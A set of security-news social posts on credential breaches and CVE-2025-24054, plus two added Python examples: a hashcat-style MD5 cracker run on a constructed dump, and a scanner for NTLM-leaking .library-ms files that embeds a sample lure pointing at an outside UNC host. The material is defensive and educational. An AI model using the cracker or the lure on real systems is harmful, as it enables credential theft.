Rhaetian Railway has confirmed unauthorized access to customer data linked to its Vereina car shuttle ticketing system.

While card data was not impacted, exposed account credentials raise familiar questions around access control, credential storage, and customer-facing attack surfaces in transport infrastructure.

This incident reinforces the importance of continuous monitoring and credential hygiene in public-sector systems.

Follow @technadu for sober, technically grounded cybersecurity reporting.

Source: https://www.inside-it.ch/datenleck-bei-der-rhaetischen-bahn-20260122

Thoughts and analysis welcome.

#InfoSec #DataBreach #TransportSecurity #CredentialSecurity #PublicInfrastructure #CyberRisk

A recent investigation into malicious Chrome extensions targeting enterprise HR and ERP platforms highlights a persistent challenge: browser extensions operating with elevated trust.

The campaign involved credential cookie exfiltration, session hijacking, and interference with administrative security controls - demonstrating how extensions can bypass traditional perimeter defenses.

This reinforces the need for stronger browser governance, extension allow-listing, and visibility within enterprise environments.

Follow @technadu for neutral, practitioner-focused cybersecurity reporting.

Source: https://www.bleepingcomputer.com/news/security/credential-stealing-chrome-extensions-target-enterprise-hr-platforms/

Thoughtful discussion encouraged.

#InfoSec #EnterpriseSecurity #BrowserHardening #IdentityThreats #CredentialSecurity #SaaSRisk #CyberDefense #SecurityAwareness

Recent law enforcement actions against suspected Black Basta affiliates highlight how modern ransomware groups operate.
Investigators say some members focused on credential recovery and access enablement, while leadership coordinated targeting, negotiations, and cryptocurrency payments. Authorities seized digital media and continue forensic analysis.

Defensive implications:
• Credential theft remains a primary entry point
• Ransomware operations are modular and role-based
• Early-stage detection is critical
How are organizations adjusting controls to detect access misuse sooner?

Source: https://therecord.media/police-raid-homes-of-alleged-black-basta-hackers

Engage with the discussion and follow TechNadu for objective InfoSec coverage.

#InfoSec #Ransomware #ThreatIntelligence #CredentialSecurity #IncidentResponse #CyberDefense #TechNadu

APT28 is running credential-stealing campaigns to fuel long-term espionage — persistence, not noise, remains the real threat. Identity is still the weakest link. 🕵️‍♂️🔑 #APT #CredentialSecurity

https://thehackernews.com/2026/01/russian-apt28-runs-credential-stealing.html

Russian APT28 Runs Credential-Stealing Campaign Targeting Energy and Policy Organizations

Russian-linked APT28 ran credential-harvesting attacks in 2025 using fake Microsoft, Google, and VPN login pages, PDF lures, and legitimate web servic

The Hacker News

🚨 Collins Aerospace Breached Twice in One Week — Everest + Ransomware

Evidence confirms two distinct incidents:
– Everest data exfiltration (Sept 10–11): leveraged old credentials from a 2022 RedLine infection.
– Ransomware attack (Sept 19): separate event, caused system disruptions.

Legacy credentials remain one of the most exploited weaknesses in enterprise networks.

💬 How does your team track and rotate long-term credentials? Comment below & follow TechNadu for real-time cyber intelligence.

#CyberSecurity #CollinsAerospace #Everest #Ransomware #RedLineStealer #InfoSec #CredentialSecurity #ThreatIntel #AviationSecurity #CyberDefense #ZeroTrust #TechNadu

AI MCP servers have a glaring security hole: long-lived, static credentials are putting data, code, and production systems at risk. https://jpmellojr.blogspot.com/2025/10/model-context-protocol-credential.html #AIsecurity #CredentialSecurity #MCP #APISecurity #SecretsManagement #Astrix

Palo Alto Networks CEO Nikesh Arora warns that agentic AI browsers may face resistance in corporate settings due to security concerns, stressing the need for robust credential controls and highlighting ongoing industry investment in AI models.
#YonhapInfomax #PaloAltoNetworks #AgenticAI #CredentialSecurity #CyberArk #EnterpriseSecurity #Economics #FinancialMarkets #Banking #Securities #Bonds #StockMarket
https://en.infomaxai.com/news/articleView.html?idxno=80336

🍔 Weak password practices strike again—“123456” led to a breach exposing data of 64M McDonald’s job applicants. Basic hygiene still matters.
#CredentialSecurity #DataBreach 🔓📄

https://www.bleepingcomputer.com/news/security/123456-password-exposed-info-for-64-million-mcdonalds-job-applicants/

'123456' password exposed info for 64 million McDonald’s job applicants

Cybersecurity researchers discovered a vulnerability in McHire, McDonald's chatbot job application platform, that exposed the personal information of more than 64 million job applicants across the United States.

BleepingComputer

🐈‍⬛ Hashcat – A Practical Guide to Password Auditing

Hashcat is a powerful GPU-accelerated password recovery tool used by security professionals to test the strength of passwords in authorized environments.

🧠 What Hashcat is used for:
• Auditing password hashes (e.g., from Windows, Linux, web apps)
• Testing password policies and complexity
• Identifying weak or reused credentials in simulated lab setups

🔐 Key Features:
• Supports a wide variety of hash types (MD5, SHA1, NTLM, bcrypt, etc.)
• Multiple attack modes: dictionary, brute-force, mask, hybrid, rule-based
• Highly customizable and efficient with GPU acceleration
• Works well for red teamers and defenders validating password hygiene

🎯 When to use it:
• During penetration tests (with permission)
• In password policy assessments
• For internal security audits and training exercises

Disclaimer: This guide is for educational and ethical use only. Only audit password hashes on systems you own or have explicit authorization to test.

#Hashcat #CyberSecurity #PasswordAuditing #EthicalHacking #InfoSec #EducationOnly #RedTeamTools #CredentialSecurity #GPUCracking #SecurityAssessment
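An added example, not from the post above and not hashcat's own code: a small Python script that reproduces what a hashcat audit does for the attack modes the post lists (dictionary with rules, and mask) against a constructed dump of unsalted MD5 hashes (hashcat -m 0; NTLM would be -m 1000), then reports which accounts fell and which users share a password. The rule syntax is a subset of hashcat's real rule functions; the user names, hashes, wordlist and rules are all constructed for the demonstration.

```python
"""Toy password audit in the style of a hashcat run (constructed example):
dictionary, rule-based and mask attacks against unsalted MD5 hashes, followed
by a weak/reused-credential report. Mirrors hashcat -a 0 (straight, with -r
rules) and -a 3 (mask); it is not hashcat and is far slower."""
import hashlib
import itertools
import string

def md5_hex(s):
    return hashlib.md5(s.encode("utf-8")).hexdigest()

# Constructed sample dump: user -> unsalted MD5 hash (hashcat -m 0).
# dana and erin deliberately share a password so reuse shows up in the report.
SAMPLE_DUMP = {
    "alice": md5_hex("Summer2024!"),
    "bob":   md5_hex("123456"),
    "carol": md5_hex("drowssap"),
    "dana":  md5_hex("Welcome1"),
    "erin":  md5_hex("Welcome1"),
    "frank": md5_hex("0427"),
    "grace": md5_hex("x7#Qp!v9Lm@2"),
}

# Constructed wordlist plus a handful of hashcat rule functions:
# ':' no-op, 'l' lower, 'u' upper, 'c' capitalise, 'r' reverse, '$X' append X,
# '^X' prepend X. Real rule files (best64.rule etc.) use the same syntax.
WORDLIST = ["password", "123456", "welcome", "summer2024", "letmein"]
RULES = [":", "l", "u", "c", "r", "c$1", "c$!", "$1$2$3", "^1"]
MASK_CHARSETS = {"?d": string.digits, "?l": string.ascii_lowercase,
                 "?u": string.ascii_uppercase}

def apply_rule(word, rule):
    """Apply a hashcat-style rule string (subset above) to one candidate."""
    i = 0
    while i < len(rule):
        op = rule[i]
        if op == ":":
            pass
        elif op == "l":
            word = word.lower()
        elif op == "u":
            word = word.upper()
        elif op == "c":
            word = word[:1].upper() + word[1:].lower()
        elif op == "r":
            word = word[::-1]
        elif op in "$^":
            i += 1  # the next character is the operand
            word = word + rule[i] if op == "$" else rule[i] + word
        else:
            raise ValueError(f"unsupported rule function {op!r}")
        i += 1
    return word

def mask_candidates(mask):
    """Expand a mask made only of ?d/?l/?u tokens, e.g. '?d?d?d?d' -> 0000..9999."""
    tokens = [mask[i:i + 2] for i in range(0, len(mask), 2)]
    for combo in itertools.product(*(MASK_CHARSETS[t] for t in tokens)):
        yield "".join(combo)

def candidates(wordlist, rules, masks):
    for word in wordlist:
        for rule in rules:
            yield apply_rule(word, rule)
    for mask in masks:
        yield from mask_candidates(mask)

def crack(dump, wordlist=WORDLIST, rules=RULES, masks=("?d?d?d?d",)):
    """Return {user: plaintext or None}; None means the hash survived the audit."""
    targets = set(dump.values())
    found = {}
    for cand in candidates(wordlist, rules, masks):
        h = md5_hex(cand)
        if h in targets and h not in found:
            found[h] = cand
            if len(found) == len(targets):
                break
    return {user: found.get(h) for user, h in dump.items()}

def reused_passwords(dump):
    """Groups of users whose hashes are identical (same password, no salt)."""
    by_hash = {}
    for user, h in dump.items():
        by_hash.setdefault(h, []).append(user)
    return [users for users in by_hash.values() if len(users) > 1]

if __name__ == "__main__":
    for user, pw in crack(SAMPLE_DUMP).items():
        print(f"{user:6} {'CRACKED ' + pw if pw else 'survived'}")
    print("reused:", reused_passwords(SAMPLE_DUMP))
```

The reuse check works only because these hashes are unsalted: identical passwords give identical hashes, which is itself a finding against the application that produced the dump. With a salted or slow hash (bcrypt, scrypt) the same audit costs orders of magnitude more per candidate, which is exactly why the mask and rule budget matters in a real hashcat session.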

⚠️ CVE-2025-24054 is now under active attack — and it only takes a single click to leak NTLM hashes from a Windows system.

CISA has added this medium-severity Windows vulnerability to its Known Exploited Vulnerabilities catalog after confirming exploitation in the wild. The flaw enables attackers to harvest NTLM credentials through specially crafted .library-ms files.

Here’s how it works:
- A user receives a malicious file — even a single click (no execution needed) can trigger NTLM hash leakage
- Attackers send these files via phishing emails, often packed in ZIP archives or delivered directly
- Opening the archive or previewing the file initiates an SMB request, leaking NTLMv2-SSP hashes
- These hashes can then be used for pass-the-hash or lateral movement attacks inside the network

Check Point reports that the vulnerability has been exploited in at least 10 campaigns so far, targeting government and private organizations in Poland, Romania, Ukraine, and Colombia.

What makes this threat more dangerous:
- NTLM is deprecated but still present in many environments
- Minimal user interaction is required — just download and extract
- It bypasses common detection tools by triggering quietly in Windows Explorer
- It's a variant of a previously exploited flaw (CVE-2024-43451)

Microsoft patched the flaw in March, but exploitation began almost immediately. Agencies under the FCEB have until May 8 to patch — but every organization should act sooner.

At @Efani we view this as another reminder that legacy protocols like NTLM are low-hanging fruit for attackers. Even medium-severity flaws can become major risks when they require near-zero user interaction.

Patch. Audit. Replace legacy auth where possible.

#CyberSecurity #NTLM #WindowsVulnerability #CVE202524054 #CredentialSecurity #EfaniSecure
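An added example, not from the post above and not Efani's code: a Python triage scanner for .library-ms files of the kind the post describes. A library file is XML whose simpleLocation/url element names the folder the library displays; the scanner flags any library whose location is a UNC path to a host outside a hypothetical allowlist. It assumes, since the post does not spell out the file contents, that the lure points its location at a remote UNC path, which is the usual way a library file makes Explorer open an SMB connection. The allowlist host, the two sample files and the 203.0.113.10 address (an RFC 5737 documentation range) are constructed.

```python
"""Triage scanner for Windows .library-ms files (constructed example).
A library description is XML; <simpleLocation><url> names the folder the
library displays. Libraries whose location is a UNC path to a host outside a
hypothetical allowlist are flagged as candidate NTLM-leak lures."""
import re
import sys
import xml.etree.ElementTree as ET
from pathlib import Path

LIB_NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")   # \\host\share\... (not the \\?\UNC\ form)

# Hypothetical allowlist of file servers a library may legitimately point at.
TRUSTED_HOSTS = {"fileserver.corp.example"}

# Constructed samples. The lure uses a documentation-range IP (RFC 5737).
BENIGN_LIBRARY = rb"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>C:\Users\Public\Documents</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

LURE_LIBRARY = rb"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\203.0.113.10\share</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

def library_urls(xml_bytes):
    """All location URLs in a library description (empty list if none)."""
    root = ET.fromstring(xml_bytes)
    return [u.text.strip()
            for u in root.iterfind(".//lib:simpleLocation/lib:url", LIB_NS)
            if u.text]

def classify_url(url, trusted=TRUSTED_HOSTS):
    m = UNC_RE.match(url)
    if not m:
        return "local"          # drive letter or other non-UNC path
    host = m.group(1).lower()
    return "trusted-unc" if host in trusted else "untrusted-unc"

def triage(xml_bytes, trusted=TRUSTED_HOSTS):
    """Return [(url, verdict)]; a malformed file gets one 'unparseable' entry."""
    try:
        return [(u, classify_url(u, trusted)) for u in library_urls(xml_bytes)]
    except ET.ParseError:
        return [("", "unparseable")]

def is_suspicious(xml_bytes, trusted=TRUSTED_HOSTS):
    """True if any location is an untrusted UNC host or the XML is malformed."""
    return any(v in ("untrusted-unc", "unparseable")
               for _, v in triage(xml_bytes, trusted))

def scan_directory(directory, trusted=TRUSTED_HOSTS):
    """Map each *.library-ms under directory to its triage result."""
    return {str(p): triage(p.read_bytes(), trusted)
            for p in Path(directory).rglob("*.library-ms")}

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_LIBRARY), ("lure", LURE_LIBRARY)):
        print(name, triage(blob), "SUSPICIOUS" if is_suspicious(blob) else "ok")
    if len(sys.argv) > 1:   # optional: scan a quarantine or mail-attachment folder
        for path, result in scan_directory(sys.argv[1]).items():
            print(path, result)
```

Run it against a quarantine folder (`python scan.py /path/to/attachments`) rather than a user's profile, since the point is to inspect files before Explorer renders them. A scanner like this complements, and does not replace, the patch and the network control the post implies: blocking outbound TCP/445 at the perimeter stops the hash from leaving even when a lure is opened.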